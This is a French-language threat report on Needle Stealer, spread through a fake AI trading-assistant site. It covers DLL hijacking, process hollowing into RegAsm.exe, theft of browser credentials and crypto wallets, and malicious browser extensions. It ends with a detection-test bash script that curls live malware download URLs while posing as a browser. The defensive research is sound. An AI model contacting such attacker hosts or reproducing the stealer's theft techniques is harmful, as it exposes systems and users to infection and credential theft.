Un Faux Site de Trading Installe un Malware qui Pirate les Navigateurs
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Un site Web frauduleux faisant la publicité d’un assistant de trading basé sur l’IA est utilisé pour propager le vol d’informations Needle Stealer. La chaîne d’infection repose sur le détournement de DLL et le creusement de processus pour injecter le malware dans RegAsm.exe, l’aidant à se fondre dans l’activité légitime du système. Une fois actif, le voleur collecte les données du navigateur, cible les informations des portefeuilles de cryptomonnaie et peut déployer des extensions de navigateur malveillantes pour approfondir la compromission. La communication avec l’infrastructure contrôlée par l’attaquant est gérée via plusieurs points de terminaison d’API HTTP.
Enquête
Les chercheurs ont retracé le flux d’infection jusqu’à une archive ZIP téléchargée depuis tradingclaw.pro, qui contenait un chargeur de DLL nommé iviewers.dll. Ce chargeur a installé une DLL de deuxième étape qui a creusé RegAsm.exe et lancé le Needle Stealer basé sur Golang. Une analyse plus poussée a montré que le voleur extrayait des archives ZIP dissimulées contenant des extensions de navigateur malveillantes ainsi qu’un fichier de configuration qui définissait ses serveurs de commande et de contrôle.
Atténuation
Les utilisateurs doivent éviter de télécharger des logiciels à partir de sites Web non fiables et toujours vérifier les signatures des éditeurs avant d’exécuter un installateur. Les équipes de sécurité doivent auditer régulièrement les extensions de navigateur installées et supprimer celles qui semblent non autorisées ou suspectes. La surveillance du réseau doit être configurée pour détecter le trafic vers les noms de domaine et adresses IP malveillants connus liés à la campagne. Les outils de protection des points de terminaison doivent également être ajustés pour identifier le comportement de détournement de DLL et les techniques de creusement de processus.
Réponse
Les défenseurs doivent vérifier la télémétrie des points de terminaison pour l’exécution de iviewers.dll et des signes d’injection dans RegAsm.exe. Les domaines de commande et de contrôle identifiés et les adresses IP doivent être bloqués au niveau du pare-feu ou du proxy. Les équipes de sécurité doivent mettre en quarantaine les fichiers qui correspondent aux hachages ou noms de fichiers signalés, retirer les extensions suspectes de %LOCALAPPDATA%PackagesExtensions, et réinitialiser les identifiants liés aux comptes affectés. Tout portefeuille de cryptomonnaie potentiellement impacté doit également être vérifié pour une activité non autorisée.
"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes step_a["<b>Action</b> – <b>T1659 Content Injection</b><br/>User visits malicious TradingClaw site to obtain malicious content.<br/><b>Description</b>: Adversaries inject malicious content into a legitimate website to deliver payloads."] class step_a action step_b["<b>Action</b> – <b>T1204.001 Malicious Link</b><br/>User clicks and downloads malicious ZIP archive.<br/><b>Description</b>: User is tricked into clicking a malicious link that leads to credentialu2011stealing or other payload download."] class step_b action step_c["<b>Action</b> – Multiple techniques<br/><b>Masquerading T1036.001</b>: iviewers.dll mimics legitimate file.<br/><b>Subvert Trust Controls T1553.002</b>: Bypass trust by hijacking DLL.<br/><b>System Binary Proxy Execution T1218</b>: Use of system binary for execution.<br/><b>Trusted Developer Utilities Proxy Execution T1127</b>: Abuse trusted utilities.<br/><b>Reflective Code Loading T1620</b>: Load code without touching disk.<br/><b>Description</b>: DLL hijacking via iviewers.dll to execute malicious code."] class step_c action step_d["<b>Process Injection</b> – <b>T1055.012 Process Hollowing</b><br/>Malicious code injected into RegAsm.exe process.<br/><b>Description</b>: Adversary creates a hollow process and inserts malicious payload."] class step_d process step_e["<b>Malware</b> – Needle Stealer core<br/>Collects victim data after execution."] class step_e malware step_f["<b>Credential Access</b> – <b>T1115 Clipboard Data</b><br/>Collects clipboard contents.<br/><b>Description</b>: Capture data copied to clipboard such as passwords."] class step_f action step_g["<b>Input Capture</b> – <b>T1056 Input Capture</b><br/>Captures typed form inputs.<br/><b>Description</b>: Records keystrokes or form fields to steal credentials."] class step_g action step_h["<b>Credential Access</b> – Multiple techniques<br/><b>Browser Information Discovery T1217</b>: Enumerates installed browsers.<br/><b>Credentials from Web Browsers T1555.003</b>: Extracts saved passwords.<br/><b>Web Session Cookie T1550.004</b>: Reads session cookies.<br/><b>Steal Web Session Cookie T1539</b>: Exfiltrates cookies.<br/><b>Forge Web Credentials T1606</b>: Creates forged credentials.<br/><b>Description</b>: Steals browser data, credentials and cookies."] class step_h action step_i["<b>Persistence</b> – <b>T1176 Software Extensions</b><br/>Installs malicious browser extension.<br/><b>Description</b>: Extension persists in browser and can modify traffic."] class step_i action step_j["<b>Action</b> – Extension manipulates traffic<br/>Redirects requests, replaces downloads, injects scripts."] class step_j action step_k["<b>Command and Control</b> – Multiple techniques<br/><b>Data Encoding T1132.001</b>: Encode data before exfiltration.<br/><b>Exfiltration Over C2 Channel T1041</b>: Send data through C2.<br/><b>Description</b>: Communicates stolen data to remote server."] class step_k action %% Connections step_a –>|leads_to| step_b step_b –>|leads_to| step_c step_c –>|leads_to| step_d step_d –>|leads_to| step_e step_e –>|collects| step_f step_e –>|collects| step_g step_e –>|collects| step_h step_e –>|installs| step_i step_i –>|enables| step_j step_j –>|communicates| step_k "
Flux d’Attaque
Détections
Possible tentative de chargement latéral de DLL utilisant Oleview (via image_load)
Voir
Commande et contrôle suspect par demande DNS de domaine de premier niveau inhabituel (TLD) (via DNS)
Voir
IOCs (HashSha256) pour détecter : Site de trading malveillant déploie des malware qui prennent le contrôle de votre navigateur
Voir
IOCs (SourceIP) pour détecter : Site de trading malveillant déploie des malware qui prennent le contrôle de votre navigateur
Voir
IOCs (DestinationIP) pour détecter : Site de trading malveillant déploie des malware qui prennent le contrôle de votre navigateur
Voir
Détection des sites Malveillants TradingClaw et de Redirection [Serveur Web]
Voir
Exécution de Simulation
Prérequis : Le contrôle préalable de télémétrie et de base doit être passé.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et la narration DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.
-
Narratif d’Attaque & Commandes :
Un adversaire ayant obtenu le malware Needle Stealer l’héberge sur le domaine malveillanttradingclaw.pro. L’attaquant persuade une victime d’ouvrir un lien malveillant (par exemple, via un e-mail de phishing). Le navigateur de la victime effectue une requête HTTP GET vershttp://tradingclaw.pro/stealer.exe, que le proxy enregistre. Comme l’URL contient la chaîne exactetradingclaw.pro, la condition de la règle Sigma (url|contains) s’évalue à vrai, générant une alerte.Pour reproduire cela dans un environnement de test, nous émettons une commande directe
curlvers le domaine malveillant. La requête est conçue pour ressembler à un trafic utilisateur typique (User-Agent standard, sans en-têtes spéciaux) de sorte que seul le domaine correspond drive l’alerte. -
Script de Test de Régression :
#!/usr/bin/env bash # ------------------------------------------------------------ # Simulate malicious access to trigger the "Malicious TradingClaw" # detection rule. # ------------------------------------------------------------ set -euo pipefail # Define the malicious URLs (exact strings used by the rule) MALICIOUS_URLS=( "http://tradingclaw.pro/stealer.exe" "https://studypages.com/download/needle.exe" ) for url in "${MALICIOUS_URLS[@]}"; do echo "[*] Requesting ${url}" # Use a realistic user‑agent to mimic a browser curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36" -s -o /dev/null "${url}" done echo "[+] Simulation completed." -
Commandes de Nettoyage :
# No persistent artifacts are created by the curl requests. # Flush DNS cache to avoid accidental reuse of the domain in later tests. if command -v ipconfig >/dev/null 2>&1; then ipconfig /flushdns elif command -v systemd-resolve >/dev/null 2>&1; then systemd-resolve --flush-caches fi echo "[+] Cleanup completed."
Fin du Rapport